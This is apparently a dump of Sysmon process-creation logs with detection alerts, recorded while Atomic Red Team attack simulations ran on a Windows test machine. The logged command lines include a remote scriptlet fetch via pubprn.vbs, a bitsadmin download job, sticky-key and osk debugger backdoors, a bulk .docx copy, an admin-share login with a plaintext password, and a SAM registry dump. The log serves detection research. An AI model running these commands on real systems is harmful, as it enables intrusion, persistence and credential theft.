+ SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07
+ 747F3D96-D849-5D31-0000-0010E54F2F00
+ 3284
+ C:\Windows\System32\cmd.exe
+ cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547721.109076,2019-07-19T18:48:41.109076+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3673
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:41.068
+ 747F3D96-D849-5D31-0000-0010E54F2F00
+ 3284
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /c net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D849-5D31-0000-0010914D2F00
+ 2096
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547721.085108,2019-07-19T18:48:41.085108+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3672
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:41.034
+ 747F3D96-D849-5D31-0000-0010914D2F00
+ 2096
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "cmd.exe /c " net use \\Target\C$ P@ssw0rd1 /u:DOMAIN\Administrator
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547717.347265,2019-07-19T18:48:37.347265+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3670
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:37.099
+ 747F3D96-D845-5D31-0000-001098212F00
+ 2624
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1059 ] wscript or cscript runing script,1563547717.264352,2019-07-19T18:48:37.264352+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) Trying to run wscript or cscript with Command Line (cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) and Parent Image :C:\Windows\System32\cmd.exe , Parent CommandLine ("C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct) in directory : ( C:\AtomicRedTeam\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3669
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:36.869
+ 747F3D96-D844-5D31-0000-0010C70A2F00
+ 2484
+ C:\Windows\System32\cscript.exe
+ 5.812.10240.16384
+ Microsoft ® Console Based Script Host
+ Microsoft ® Windows Script Host
+ Microsoft Corporation
+ cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=0E3C0779D8EAAD3B00363D7890DDC8272B510D49,MD5=A45586B3A5A291516CD10EF4FD3EE768,SHA256=59D3CDC7D51FA34C6B27B8B04EA17992955466EB25022B7BD64880AB35DF0BBC,IMPHASH=2B44D2206B9865383429E9C1524F1CAC
+ 747F3D96-D844-5D31-0000-001075082F00
+ 7140
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547716.882586,2019-07-19T18:48:36.882586+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3668
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:36.811
+ 747F3D96-D844-5D31-0000-001075082F00
+ 7140
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "cscript.exe /b C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost " script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1216/payloads/T1216.sct
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547716.834888,2019-07-19T18:48:36.834888+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3667
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:31.222
+ 747F3D96-D83F-5D31-0000-00105EF22E00
+ 4888
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547711.157171,2019-07-19T18:48:31.157171+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3665
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:31.115
+ 747F3D96-D83F-5D31-0000-001001EC2E00
+ 3760
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /resume AtomicBITS"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547711.04171,2019-07-19T18:48:31.041710+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3663
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:30.995
+ 747F3D96-D83E-5D31-0000-001046E52E00
+ 4332
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /complete AtomicBITS"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.917348,2019-07-19T18:48:30.917348+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3661
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:30.882
+ 747F3D96-D83E-5D31-0000-001088DE2E00
+ 7072
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /setnotifycmdline AtomicBITS C:\Windows\system32\notepad.exe C:\Windows\Temp\bitsadmin_flag.ps1"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547710.807486,2019-07-19T18:48:30.807486+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3659
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:48:30.775
+ 747F3D96-D83E-5D31-0000-0010A2D72E00
+ 4036
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "bitsadmin.exe /addfile AtomicBITS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\Windows\Temp\bitsadmin_flag.ps1"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547807.299766,2019-07-19T18:50:07.299766+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3733
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:07.254
+ 747F3D96-D89F-5D31-0000-00106C7D3200
+ 864
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\sethc.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547807.279972,2019-07-19T18:50:07.279972+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3732
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:02.238
+ 747F3D96-D89A-5D31-0000-0010F2703200
+ 1132
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547802.194097,2019-07-19T18:50:02.194097+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3729
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:50:02.144
+ 747F3D96-D89A-5D31-0000-0010A46B3200
+ 1228
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "reg add " HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution "Options\osk.exe /v Debugger /t REG_SZ /d C:\windows\system32\cmd.exe /f"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547802.174886,2019-07-19T18:50:02.174886+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3728
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:52.263
+ 747F3D96-D890-5D31-0000-001085443200
+ 4316
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547792.275626,2019-07-19T18:49:52.275626+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3727
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:52.202
+ 747F3D96-D890-5D31-0000-0010FA3F3200
+ 1568
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "for /R c: %%f in (*.docx) do copy %%f c:\temp\"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547792.053916,2019-07-19T18:49:52.053916+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx " ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3725
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:52.011
+ 747F3D96-D890-5D31-0000-001012383200
+ 608
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ C:\Windows\system32\cmd.exe /S /D /c" dir c: /b /s .docx "
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D88F-5D31-0000-0010BD353200
+ 2780
+ C:\Windows\System32\cmd.exe
+ "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx"
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547792.048002,2019-07-19T18:49:52.048002+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3724
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:51.971
+ 747F3D96-D88F-5D31-0000-0010BD353200
+ 2780
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c "dir c: /b /s .docx | findstr /e .docx"
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547791.99625,2019-07-19T18:49:51.996250+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 3723
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2019-07-19 14:49:43.520
+ 747F3D96-D887-5D31-0000-0010D51F3200
+ 752
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\system32\cmd.exe" /c
+ C:\AtomicRedTeam\
+ MSEDGEWIN10\IEUser
+ 747F3D96-D4B4-5D31-0000-002051090500
+ 0x50951
+ 1
+ High
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-D6F7-5D31-0000-00104ACE2500
+ 3912
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1563547781.691049,2019-07-19T18:49:41.691049+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\system32\cmd.exe" /c "reg save HKLM\SAM sam.hive" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
